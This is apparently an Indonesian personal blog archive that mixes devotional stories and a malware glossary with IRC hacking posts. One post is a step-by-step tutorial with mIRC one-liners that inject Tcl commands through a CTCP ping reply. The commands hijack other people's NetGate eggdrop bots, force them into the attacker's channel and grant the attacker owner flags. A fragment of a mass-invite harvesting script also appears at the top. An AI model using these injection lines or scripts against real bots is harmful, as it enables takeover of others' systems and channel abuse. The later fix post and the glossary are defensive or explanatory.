-
Start Mass-invite: /tanya
-
End Mass-invite / Reset: /disconnect | unset %tc %tp %pn %p %cunt* | remove penghuni.txt
}

on me:JOIN:#: set %tc $chan
alias undangall {
set %tp $nick(%tc,0)
set %pn 1
:begin
set %p $nick(%tc,%pn)
/write penghuni.txt %p
inc %pn
if ( %pn >= %tp ) { goto end }
goto begin
:end
/part %tc
/pesan
}
on 1:CHAT:*: /ignore -pntik *!*@*

Nah demikian saja sedikit informasi dan ilmu saya bagikan, semoga menikmati.Maaf penulis tidak bertanggung jawab atas tindakan yang dilakukan karena artikel ini, artikel ini hanya dibuat untuk pengetahuan.Segala sesuatu yang berkaitan dengan artikel ini bukan lah tanggung jawab penulis.

NB: Tutor diambil dari -= http://www.jasakom.com =-

Ketika aku sudah tua

Ketika aku sudah tua, bukan lagi aku yang semula. Mengertilah, bersabarlah sedikit terhadap aku.

Ketika pakaianku terciprat sup, ketika aku lupa bagaimana mengikat sepatu, ingatlah bagaimana dahulu aku mengajarmu.

Ketika aku berulang-ulang berkata-kata tentang sesuatu yang telah bosan kau dengar, bersabarlah mendengarkan, jangan memutus pembicaraanku. Ketika kau kecil, aku selalu harus mengulang cerita yang telah beribu-ribu kali kuceritakan agar kau tidur.

Ketika aku memerlukanmu untuk memandikanku, jangan marah padaku. Ingatkah sewaktu kecil aku harus memakai segala cara untuk membujukmu mandi?

Ketika aku tak paham sedikitpun tentang tehnologi dan hal-hal baru, jangan mengejekku. Pikirkan bagaimana dahulu aku begitu sabar menjawab setiap "mengapa" darimu.

Ketika aku tak dapat berjalan, ulurkan tanganmu yang masih kuat untuk memapahku. Seperti aku memapahmu saat kau belajar berjalan waktu masih kecil.

Ketika aku seketika melupakan pembicaraan kita, berilah aku waktu untuk mengingat. Sebenarnya bagiku, apa yang dibicarakan tidaklah penting, asalkan kau disamping mendengarkan, aku sudah sangat puas.

Ketika kau memandang aku yang mulai menua, janganlah berduka. Mengertilah aku, dukung aku, seperti aku menghadapimu ketika kamu mulai belajar menjalani kehidupan. Waktu itu aku memberi petunjuk bagaimana menjalani kehidupan ini, sekarang temani aku menjalankan sisa hidupku. Beri aku cintamu dan kesabaran, aku akan memberikan senyum penuh rasa syukur, dalam senyum ini terdapat cintaku yang tak terhingga untukmu.

Cegah Pencuri Bot di IRC.DAL.NET

Pada beberapa waktu lalu saya sudah memberikan sedikit pengalaman dan sedikit sharing tentang bagaimana mencuri bot. Hal ini dapat terjadi karena TCL NetGate memiliki bug, dan banyak orang telah memodifikasinya sehingga mereka menambahkan owner serta basechan mereka. Sekarang sudah saat nya saya memberikan cara bagaimana untuk menangkalnya. Fix yang akan kita lakukan ini agak sedikit bervariasi, karena TCL NetGate sendiri di kembangkan oleh banyak orang sehingga bergantung pada siapakah yang memodifikasinya. Nah untuk itu mari kita mulai dengan tutorial kecil kita.Untuk itu marilah ikuti langkah-langkah seperti berikut:

1. Yang pertama kali adalah jangan lupa untuk hidupkan kompi dan duduk di depan kompi mu.
2. Eits sebelum memulai beraksi, kita harus menyiapkan diri agar tetap tenang dan dapat berpikir jernih. Jangan lupa rokok, korek dan segelas topi hitam hangatnya.
3. Nah setelah semua siap maka, hmmm .... nyalakan dulu rokoknya donk. Nah setelah itu teguklah kopi hitam kental dan hangat yang akan membuat perasaan tenang dan nikmat.
4. Setelah kita bisa tenang dan berpikir jernih maka waktu nya bagi kita untuk siap beraksi.
5. Pertama kali kita harus membuka TCL nya, dalam hal ini namanya bisa bermacam-macam tapi yang pasti yang merupakan TCL pengaturan botnya.
6. Nah yang harus kita lakukan pada TCL nya adalah dengan menghilangkan auto owner dari sang pembuat script.Maaf disini aku tidak akan memberitahu secara rinci mengenai penghapusan penambahan owner dan basechan. Karena hal ini sangat ditentukan oleh siapa perombak tcl tersebut. So beda-beda tiap nama tcl turunan NetGate.
7. Nah klo itu semua sudah beres dan bot kita tidak lagi join ke channel aneh2 ato melakukan sesuatu yg aneh2 maka tinggal kita kelarkan dech bug dasar dari TCL netgate ini.
8. Carilah barisan script sebagai berikut:

bind ctcp - UNBAN sl_ctcp
bind ctcp - TIME sl_ctcp
bind ctcp - VERSION sl_ctcp
bind ctcp - CHAT chat_ctcp

9. Nah setelah itu tambahkanlah barisan script berikut :

bind ctcp - PING ping_reply

10. Nah aman dech sekarang bot kamu dari para pencuri untuk sementara.hmmm SEmentara????
IYah sistem itu tidak ada yang sempurna, yang ada adalah yang lebih baik dan kurang baik. Saya tidak menjamin sepenuhnya bot kamu tidak akan dapat gangguan lain, so bongkar lebih dalam tcl nya okeh untuk terus menyempurnakannya.

DEmikianlah mungkin saya berbagi pengalaman dan informasi sedikit mengenai TCL NETGATE dan turunannya.

Monday, January 30, 2006

A Deck of Cards

I get This from Internet, Read This:


It was quiet that day, the guns, the mortars and the land mines for some reason hadn't been heard.

The young soldier knew it was Sunday, the holiest day of the week.

As he was sitting there, he got out an old deck of cards and laid them out across his bunk.

Just then an army sergeant came in and said, "Why aren't you with the rest of the platoon?

The soldier replied, "I thought I would stay behind and spend some time with the Lord."

The sergeant said, "Looks to me like you're going to play cards."

The soldier said, "No, sir. You see, since we are not allowed to have Bibles or other spiritual books in this country, I've decided to talk to the Lord by studying this deck of cards."

The sergeant asked in disbelief, "How will you do that?"

"You see the Ace, Sergeant? It reminds me that there is only one God.

"The Two represents the two parts of the Bible, Old and New Testaments.

"The Three represents the Father, Son, and the Holy Ghost.

"The Four stands for the Four Gospels: Matthew, Mark, Luke and John.

"The Five is for the five virgins that were ten but only five of them were glorified.

"The Six is for the six days it took God to create the Heavens and Earth.

"The Seven is for the day God rested after making His Creation.

"The Eight is for the family of Noah and his wife, their three sons and their wives - the eight people God spared from the flood that destroyed the earth.

"The Nine is for the lepers that Jesus cleansed of leprosy. He cleansed ten, but nine never thanked Him.

"The Ten represents the Ten Commandments that God handed down to Moses on tablets made of stone.

"The Jack is a reminder of Satan, one of God's first angels, but he got kicked out of heaven for his sly and wicked ways and is now the joker of eternal hell.

"The Queen stands for the Virgin Mary.

"The King stands for Jesus, for he is the King of all kings.

"When I count the dots on all the cards, I come up with 365 total, one for every day of the year.

"There are a total of 52 cards in a deck; each is a week, 52 weeks in a year.

"The four suits represent the four seasons: Spring, Summer, Fall and Winter.

"Each suit has thirteen cards; there are exactly thirteen weeks in a quarter

"So when I want to talk to God and thank Him, I just pull out this old deck of cards and they remind me of all that I have to be thankful for."

The sergeant just stood there. After a minute, with tears in his eyes and pain in his heart, he said, "Soldier, may I borrow that deck of cards?"

A Letter From God

Aku ada artikel sedikit yang menurutku cukup bagus.

Saat kau bangun dipagi hari, Aku memandangmu dan berharap engkau akan berbicara kepadaKu, walaupun hanya sepatah kata, meminta pendapatKu atau bersyukur kepadaKu atas sesuatu hal indah yang terjadi di dalam hidupmu kemarin, tetapi aku melihat engkau begitu sibuk mempersiapkan diri untuk pergi bekerja.

Aku kembali menanti. Saat engkau sedang bersiap, Aku tahu akan ada sedikit waktu bagimu untuk berhenti dan menyapaKu, tetapi engkau terlalu sibuk. Di satu tempat, engkau duduk di sebuah kursi selama lima belas menit tanpa melakukan apapun.

Kemudian Aku melihat engkau menggerakkan kakimu. Aku berpikir engkau ingin berbicara kepadaKu tetapi engkau berlari ke telepon dan menelepon seorang teman untuk mendengarkan gosip terbaru. Aku melihatmu ketika engkau pergi bekerja dan Aku menanti dengan sabar sepanjang hari.

Dengan semua kegiatanmu, Aku berpikir engkau terlalu sibuk untuk mengucapkan sesuatu kepadaKu. Sebelum makan siang Aku melihatmu memandang kesekeliling, mungkin engkau merasa malu untuk berbicara kepadaKu, itulah sebabnya mengapa engkau tidak menundukkan kepalamu. Engkau memandang tiga atau empat meja sekitarmu dan melihat beberapa temanmu berbicara kepadaku dengan lembut sebelum mereka makan, tetapi engkau tidak melakukannya.

Tidak apa-apa. Masih ada waktu yang tersisa, dan Aku berharap engkau akan berbicara kepadaKu, meskipun saaat engkau pulang ke rumah kelihatannya seakan-akan banyak hal yang harus kau kerjakan. Setelah beberapa hal tersebut selesai engkau kerjakan, engkau menyalakan televisi, Aku tidak tahu apakah kau suka menonton televisi atau tidak, hanya saja engkau selalu kesana dan menghabiskan banyak waktu setiap hari didepannya, tanpa memikirkan apapun hanya menikmati acara yang ditampilkan.

Kembali Aku menanti dengan sabar saat engkau mnonton TV dan menikmati makananmu tetapi kembali kau tidak berbicara kepadaKu. Saat tidur Kupikir kaumerasa terlalu lelah. Setelah mengucapkan selamat malam kepada keluargamu, kau melompat ke tempat tidur dan tertidur tak lama kemudian. Tidak apa-apa karena mungkin engkau tidak menyadari bahwa Aku selalu hadir untukmu. Aku telah bersabar lebih lama dari yang kau sadari.

Aku bahkan ingin mengajarkanmu bagaimana bersabar terhadap orang lain.Aku sangat mengasihimu, setiap hari Aku menantikan sepatah kata, doa atau pikiran atau syukur dari hatimu. Baiklah... engkau bangun kembali dan kembali. Aku akan menanti dengan penuh kasih bahwa hari ini kau akan memberiKu sedikit waktu. Semoga harimu menyenangkan.

Bapamu,
ALLAH

Friday, January 27, 2006

Malware

Malware???
Mungkin sebagian anda sudah sering mendengarnya, tetapi mungkin hanya sebagian orang yang tau tentang Malware.
Berikut ini saya akan coba memberikan beberapa keterangan dan informasi tentang apa itu dan apa saja yang termasuk 'Malware'

Berikut ini mungkin dapat membantu, definisi menurut Tante 'Wiki';
Malware (a portmanteau of "malicious software") is software designed to infiltrate or damage a computer system, without the owner's consent. The term describes the intent of the creator, rather than any particular features. Malware is commonly taken to include computer viruses, Trojan horses, and spyware. In law, malware is sometimes known as a computer contaminant, for instance in the legal codes of California, Virginia, and several other U.S. states [1]. Malware is sometimes pejoratively called scumware.

Malware should not be confused with defective software, that is, software which has a legitimate purpose but contains errors or bugs.

'Malware" adalah program komputer yang di ciptakan dengan maksud dan tujuan tertentu dari penciptanya dan merupakan program yang mencari kelemahan dari software.Umumnya Malware diciptakan untuk membobol atau merusak suatu software atau operating sistem.
Berikut adalah contoh dari malware dan keterangannya.

-=Virus=-
Inilah istilah yang sering dipakai untuk seluruh jenis perangkat lunak yang mengganggu computer. Bias jadi karena inilah tipe malware pertama yang muncul.
Virus bisa bersarang di banyak tipe file. Tapi boleh dibilang, target utama vireus adalah file yang bisa dijalankan seperti EXE, COM dan VBS, yang menjadi bagian dari suatu perangkat lunak. Boot sector juga sering dijadikan sasaran virus untuk bersarang. Beberapa file dokumen juga bisa dijadikan sarang oleh virus.
Penyebaran ke computer lain dilakukan dengan bantuan pengguna computer. Saat file yang terinfeksi dijalankan di computer lain, kemungkinan besar computer lain itu akan terinfeksi pula. Virus mencari file lain yang bisa diserangnya dan kemudian bersarang di sana.
Bisa juga virus menyebar melalui jaringan peer-to-peer yang sudah tak asing digunakan orang untuk berbagi file.

-=Worm=-
Worm alias cacing, begitu sebutannya. Kalau virus bersarang pada suatu program atau dokumen, cacing-cacing ini tidak demikan. Cacing adalah sebuah program yang berdiri sendiri dan tidak membutuhkan sarang untuk menyebarkan diri.
Hebatnya lagi, cacing bisa saja tidak memerlukan bantuan orang untuk penyebarannya. Melalui jaringan, cacing bisa “bertelur” di computer-komputer yang terhubung dalam suatu kerapuhan (vulnerability) dari suatu system, biasanya system operasi.
Setelah masuk ke dalam suatu computer, worm memodifikasi beberapa pengaturan di system operasi agar tetap hidup. Minimal, ia memasukkan diri dalam proses boot suatu computer. Lainnya, mungkin mematikan akses ke situs antivirus, menonaktifkan fitur keamanan di system, dan tindakan lain.

*kunjungi : http://news.com.com/Year+of+the+Worm/2009-1001_3-254061.html

-=Wabbit=-
Istilah ini mungkin asing, tapi memang ada malware tipe ini. Seperti worm, wabbit tidak membutuhkan suatu program dan dokumen untuk bersarang.
Tetapi berbeda dengan worm, wabbit tidak membutuhkan suatu program dan dokumen untuk bersarang.
Tetapi berbeda dengan worm yang menyebarkan diri ke computer lain menggunakan jaringan, wabbit menggandakan diri secara terus-menerus didalam sebuah computer local dan hasil penggandaan itu akan menggerogoti system.
Kinerja computer akan melambat karena wabbit memakan sumber data yang lumayan banyak. Selain memperlambat kinerja computer karena penggunaan sumber daya itu, wabbit bisa deprogram untuk memiliki efek samping yang efeknya mirip dengan malware lain. Kombinasi-kombinasi malware seperti inilah yang bisa sangat berbahaya.

-=Keylogger=-
Hati-hati kalau berinternet di warnet. Bisa saja pada computer di warnet itu diinstall suatu perangkat lunak yang dikenal dengan istilah keylogger yang mencatat semua tekanan tombol keyboard.
Catatan yang disimpan dalam suatu file yang bisa dilihat kemudian itu lengkap. Di dalamnya bisa terdapat informasi seperti aplikasi tempat penekanan tombol dilakukan dan waktu penekanan. Dengan cara ini, seseorang bisa mengetahui username, password dan berbagai informasi lain yang dimasukkan dengan cara pengetikan.
Pada tingkat yang lebih canggih, keylogger mengirimkan log yang biasanya berupa file teks itu ke seseorang. Tentu saja itu dilakukan tanpa sepengetahuan si korban. Pada tingkat ini pula keylogger bisa mengaktifkan diri ketika pengguna computer melakukan tindakan tertentu.
Misalnya begini. Ketika pengguna computer membuka situs e-banking, keylogger aktif dan mencatat semua tekanan pada keylogger aktif dan mencatat semua tekanan pada keyboard aktif dan mencatat semua tekanan pada keyboard di situs itu dengan harapan nomor PIN dapat dicatat.
Keylogger ini cukup berbahaya karena secanggih apa pun enkripsi yang diterapkan oleh suatu website, password tetap dapat diambil. Pasalnya, password itu diambil sebelum sempat dienkripsi oleh system. Jelas dong. Keylogger merekam sesaat setelah password diketikkan dan belum diproses oleh system.

-=Browser Hijacker=-
Browser hijacker mengarahkan browser yang seharusnya menampilkan situs yang sesuai dengan alamat yang dimasukkan ke situs lain.
Itu contoh paling parah dari gangguan yang disebabkan oleh browser hijacker. Contoh lain yang bisa dilakukan oleh pembajak ini adalah menambahkan bookmark, mengganti home page, serta mengubah pengaturan browser.
Bicara mengenai browser di sini boelh yakin 100% browser yang dibicarakan adalah internet explorer. Selain karena internet explorer adalah buatan Microsoft, raksasa penghasil perangkat lunak yang produknya sering dijadikan sasaran serangan cracker, internet explorer adalah browser yang paling banyak digunakan orang berinternet. Tak heran, internet explorer telah menyatu dengan Windows, system operasi milik Microsoft yang juga banyak diserbu oleh cracker.

-=Troya=-
Troya adalah malware yang seolah-olah merupakan program yang berguna, yang menghibur, yang menyelamatkan, padahal di balik itu, ia merusak. Kuda ini bisa ditunggangu oleh malware lain seperti seperti virus, worm, spyware. Troya dapat digunakan untuk menyebarkan atau mengaktifkan mereka.

-=Spyware=-
Spyware adalah perangkat lunak yang mengumpulkan dan mengirim informasi tentang pengguna computer tanpa diketahui oleh si pengguna itu.
Informasinya bisa yang tidak terlampau berbahaya seperti pola berkomputer, terutama berinternet, seseorang sampai yang berbahaya seperti nomor kartu kredit, PIN untuk perbankan elektronik (e-banking) dan password suatu akun.
Informasi tentang pola berinternet, telah disebutkan, tidak terlampau berbahaya. Situs yang dikunjungi, informasi yang kerap dicari, obrolan di ruang chat akan dimata-matai oleh si spyware.
Selanjutnya, informasi itu digunakan untuk menampilkan iklan yang biasanya berupa jendela pop-up. Iklan itu berhubungan dengan kebiasaan seseorang berinternet. Misalnya kerap kali seseorang mencari informasi mengenai kamera digital. Jendela pop-up yang muncul akan menampilkan, misalnya situs yang berdagang kamera digital. Adware adalah istilah untuk spyware yang begini.
Penyebaran spyware mirip dengan Trojan. Contohnya, flashget. Ketika flashget yang dipakai belum deregister, flashget bertindak sebagai spyware. Coba saja hubungkan diri ke internet, jalankan flashget yang belum deregister, cuekin computer beberapa saat, pasti muncul jendela internet explorer yang menampilkan iklan suatu situs.

-=Backdoor=-
Ini namanya main belakang. Kepingin cepat dapat Surat Izin mengemudi. Dari pada lewar prosedur standar yang mengharuskan test ini dan test itu, mendingan siapkan duit buat nyogok aparat. SIM cepat di dapat tanpa antre lama, tanpa test ini dan itu.
Tidak berbeda dengan dengan contoh bikin SIM tadi, dengan melanggar prosedur, malware berusaha masuk ke dalam system untuk mengakses sumber daya serta file. Berdasarkan cara bekerja dan perilaku penyebarannya, backdoor dibagi menjadi 2 grup. Grup pertama mirip dengan Troya. Mereka secara manual dimasukkan ke dalam suatu file program pada perangkat lunak dan kemudian ketika perangkat lunak itu diinstall, mereka menyebar. Grup yang kedua mirip dengan worm. Backdoor dalam grup ini dijalankan sebagai bagian dari proses boot.
Ratware adalah sebutan untuk backdoor yang mengubah computer menjadi zombie yang mengirim spam. Backdoor lain mampu mengacaukan lalu lintas jaringan, melakukan brute force untuk meng-crack password dan enkripsi., dan mendistribusikan serangan distributed denial of service.

-=Dialer=-
Andaikat computer yang digunakan, tidak ada hujan atau badai, berusaha menghubungkan diri ke internet padahal tak ada satu pun perangkat lunak yang dijalankan membutuhkan koneksi, maka layaklah bercuriga. Computer kemungkinan telah terjangkit oleh malware yang terkenal dengan istilah dialer.
Dialer menghubungkan computer ke internet guna mengirim kan informasi yang didapat oleh keylogger, spyware tau malware lain ke si seseorang yang memang bertujuan demikian. Dia dan penyedia jasa teleponlah yang paling diuntungkan dengan dialer ini.

-=Exploit dan rootkit=-
Kedua perangkat ini bisa dibilang malware bisa pula tidak. Kenapa begitu? Penjelasanya kira-kira begini.
Exploit adalah perangkat lunak yang menyerang kerapuhan keamanan (security vulnerability) yang spesifik namun tidak selalu bertujuan untuk melancarkan aksi yang tidak diinginkan. Banyak peneliti keamanan computer menggunakan exploit untuk mendemonstrasikan bahwa suatu system memiliki kerapuhan.
Memang ada badan peneliti yang bekerja sama dengan produsen perangkat lunak. Peneliti itu bertugas mencari kerapuhan dari sebuah perangkat lunak dan kalau mereka menemukannya, mereka melaporkan hasil temuan ke si produsen agar si produsen dapat mengambil tindakan.
Namun begitu exploit kadang menjadi bagian dari suatu malware yang bertugas menyerang kerapuhan keamanan.
Berbeda dengan exploit yang secara langsung menyerang system, rootkit tidak demikian. Rootkit dimasukkan ke dalam computer oleh penyerang setelah computer berhasil diambil alih.
Rootkit berguna untuk menghapus jejak penyerangan, seperti menghapus log dan menyembunyikan proses malware itu sendiri. Rootkit juga bisa mengandung backdoor agar di hari depan nanti, si penyerang bisa kembali mengambil alih system.
Rootkit ini sulit di deteksi, pasalnya rootkit ditanam pada system operasi di level kernel, level inti system operasi.
Cara terbaik yang bisa diandalkan untuk mendeteksi ada tidaknya rootkit di computer adalah dengan mematikan computer dan boot ulang tidak dengan harddisk melainkan dengan media lain seperti CD-ROM atau disket USB. Rootkit yang tidak berjalan tak dapat bersembunyi dan kebanyakan antivirus dapat mengidentifikasikannya.
Produsen perangkat keamanan biasanya telah mengintegrasikan pendeteksi rootkit di produknya. Meskipun rootkit di menyembunyikan diri selama proses pemindaian berjalan, antivirus masih bisa mengenalinya. Juga bila rootkit menarik diri dari system untuk sementara, antivirus tetap dapat menemukannya dengan menggunakan deteksi “sidik jari” alias byte unik dari rootkit.
Rootkit memang cerdik. Dia bisa menganalisis proses-proses yang sedang berjalan. Andai ia mencurigai suatu proses sebagai tindak tanduk antivirus, ia bisa menyembunyikan diri. Ketika prose situ selesai, ia aktif kembali.
Ada beberapa program yang bisa dipakai untuk mendeteksi adanya rootkit pada system. Rootkit detector kit, chkrootkit dan Rkhunter adalah contoh yang bisa digunakan.

Berikutlah artikel ini di buat untuk sedikit memberikan informasi pada anda.
Sebagian besar artikel ini di dapat dari Majalah PC+ terbitan bulan Januari.

Friday, January 20, 2006

Mencuri Bot Di IRC.DAL.NET

Dengan sedikit pengalaman di dunia irc.dal.net, hal ini membuat ku jadi tertarik. Begitu banyak yang di dapat, terutama dunia bajak-membajak mulai dari server, shell sampai pada bot (eggdrop). Ada Sedikit pengalaman bisa dijadikan pelajaran. Waktu itu aku bingung dengan tingkah laku dan tindak tanduk bot ku, aku menggunakan dua jenis TCL; pertama adalah tcl NETGATE keluaran anyar dari MAXFIDER, kedua adalah Kinana dari kinana crew (sebenarnya turunan TCL NETGATE).
Setelah melakukan pengecekan dan pelacakan ternyata bot ku dicuri, dan sudah ada beberapa channel di dalamnya yang aku tidak kenal.Dan yang membuat ku sempat ketar-ketir adalah sudah ada beberapa nama yang menjadi Owner bot ku yang aku tidak kenal. Dengan langkah seribu kulacak dan ku satroni channels tersebut.Tapi apa yang kudapati adalah channel yang banyak dengan bot curian juga.
Singkat Cerita aku mencari artikel dan informasi tentang itu, eh ternyata dapet dari teman di #binushacker dan #cerianet.Singkat cerita aku tau bahwa tcl NETGATE ada bug nya.
Ternyata ada cara untuk mengambil bot seseorang, aku akan beri sedikit tutorial:
1. Langkah pertama adalah, duduk dengan sikap manis dan nyalakan komputer mu.
2. Langkah kedua adalah siapkan software MIRC dan terhubunglah kedunia internet.
3. Langkah ketiga adalah, pasti dan tak boleh terlupakan siapkan rokok dan kopi di sampingmu.Hmm...
4. Minum sedikit kopi, lalu tariklah napas dan hisaplah sebatang rokok .... hmmmm setelah anda rileks marilah kita mulai.
5. Sekarang siapkan software MIRC mu itu, eit muncul window untuk register...hmm masak hari gini belom di register.
6. Setelah MIRC dibuka maka masukkan lah scripts berikut :
on 1:ctcpreply:ping*:{ ctcpreply $nick PING [set ctcp-mode 0;channel add #channelmu]} :pada Script Editor yang tersedia.
7. Nah setelah beres semua maka jangan lupa save dan keluar dari Script Editor.
8. Langsung dech hubungkan MIRC mu ke dunia maya, nah script mu siap dipakai beraksi dech.
9. Nah untuk menggunakannya tinggal kamu ping dengan fasilitas CTCP dari mirc untuk bot yang kamu incar.
10. Nah selesailah sudah bot itu akan masuk ke channelmu
11. Nah klo kamu mau ngambil jadi bot kmu gimana yach???Nah klo itu tinggal masukkin ajah dech script berikut ke script editor nya:
On 1:ctcpreply:ping*:{ctcpreply $nick PING [set ctcp-ping 0;adduser nickmu yournic!*@*;chattr nickmu "Zfhjmnovptx"]

Penulis tidak bertanggung jawab atas praktek yang dilakukan orang atas dibacanya Tutor ini, tutor ini diberikan hanya untuk memberikan pengetahuan.Hal yang terjadi atas penulisan ini tidak di tanggung pihak penulis.
Hmm Setelah kita punya bot itu enaknya di pake paan yach??Hmm apa bugnya cuman itu???.Nah tinggal anda obok-obok dech tuh NETGATE.tcl

Monday, November 21, 2005

Pasti Bisa

Bacaan : II Korintus 2:15-17

Pada umumnya orang berpendapat bahwa perasaan tidak sanggup adalah musuh yang perlu dilawan. Padahal seringkali perasaan tidak sanggup ini justru mempersiapkan kita untuk mencapai hasil terbesar yang dapat kita raih.

Itulah yang dialami oleh rasul Paulus ketika ia menyerahkan diri untuk memberitakan Injil kepada bangsa-bangsa. Paulus adalah orang yang berpendidikan tinggi dan kaya akan karunia. Namun ia beerkata bahwa dirinya tidak memiliki kesanggupan untuk melayani Tuhan. Dengan sikapnya itu, ia melangkah keluar dari keterbatasan dirinya dan membuka jalan bagi kuasa Roh Kudus untuk bekerja melaluinya.

Seringkali kita gagal mengambil langkah ini karena kita terlalu mudah menyerah. Bahkan kita menggunakan kelemahan kita sebagai alasan untuk tidak mengambil tugas-tugas yang sulit. Terlalu sering kita berkata, "Aku tidak dapat melakukannya," atau "Tanggung jawab itu terlalu berat bagiku." Khususnya pada waktu kita diperhadapkan dengan panggilan Allah untuk melayani. Ketahuilah, Ia tidak akan menerima alasan-alasan seperti itu karena Ia telah memberikan Roh Kudus untuk memampukan kita melakukan setiap tugas yang Ia percayakan.

Bila kita gagal membiarkan kuasa supranatural-Nya bekerja bersama, maka kegagalan itu bisa berlipat ganda. Pertama, kita akan kehilangan sukacita, damai dan kepuasan yang hanya kita peroleh bila kita melangkah dalam iman dan bersandar pada kemampuan-Nya.

Kedua, keragu-raguan itu dapat membuang kesempatan kita untuk bersaksi kepada orang lain.

Apakah Anda merasa bahwa Anda tidak memiliki apa-apa untuk dibagikan? Jangan pernah meragukan pengaruh yang dapat Anda berikan pada seseorang, yang penting bergantung pada kemampuan dan kuasa Allah.

Ia pasti melanjutkan sisanya. Dengan perkataan lain: Anda pasti bisa!

Hidup Adalah Proses

Kadang kita bertanya dlm hati & menyalahkan Tuhan, "apa yg telah saya lakukan sampai saya harus mengalami ini semua ?" atau "kenapa Tuhan membiarkan ini semua terjadi pada saya ?"

Here is a wonderful explanation...
Seorang anak memberitahu ibunya kalau segala sesuatu tidak berjalan seperti yang dia harapkan. Dia mendapatkan nilai jelek dalam raport, putus dengan pacarnya, dan sahabat terbaiknya pindah ke luar kota.

Saat itu ibunya sedang membuat kue, dan menawarkan apakah anaknya mau mencicipinya, dengan senang hati dia berkata, "Tentu saja, I love your cake."

"Nih, cicipi mentega ini," kata Ibunya menawarkan.
"Yaiks," ujar anaknya.
"Bagaimana dgn telur mentah ?"
"You're kidding me, Mom."
"Mau coba tepung terigu atau baking soda ?"
"Mom, semua itu menjijikkan!!."

Lalu Ibunya menjawab, "ya, semua itu memang kelihatannya tidak enak jika dilihat satu per satu. Tapi jika dicampur jadi satu melalui satu proses yang benar, akan menjadi kue yang enak."

Tuhan bekerja dengan cara yang sama.Seringkali kita bertanya kenapa Dia membiarkan kita melalui masa-masa yang sulit dan tidak menyenangkan. Tapi Tuhan tahu jika Dia membiarkan semuanya terjadi satu per satu sesuai dgn rancanganNya, segala sesuatunya kan menjadi sempurna tepat pada waktunya.

Kita hanya perlu percaya proses ini diperlukan untuk menyempurnakan hidup kita.

Tuhan teramat sangat mencintai kita. Dia mengirimkan bunga setiap musim semi, sinar matahari setiap pagi. Setiap saat kita ingin bicara, Dia akan mendengarkan. Dia ada setiap saat kita membutuhkanNya, Dia ada di setiap tempat, dan Dia memilih untuk berdiam di hati kita.

{air hidup}

Wednesday, November 16, 2005

Mental Attitude

Whatever the severity of situation and the individual's physical capability to cope, mental attitude is the real key to survival. Human beings are great survivors, using their brains to keep one step ahead of their animal competitors. In wilderness survival situation, humans have to relearn many manual skills. Common sense is one of the most basic and valuable of human characteristics, but much more important than even this is the will to survive.

It's up to You

Above all, survival demands mental toughness and very clear thinking. The logical evaluation of everything you know and a hard-headed assessment of your own abilities and those of the members of your party may lead to unpalatable conclusions and difficult decisions.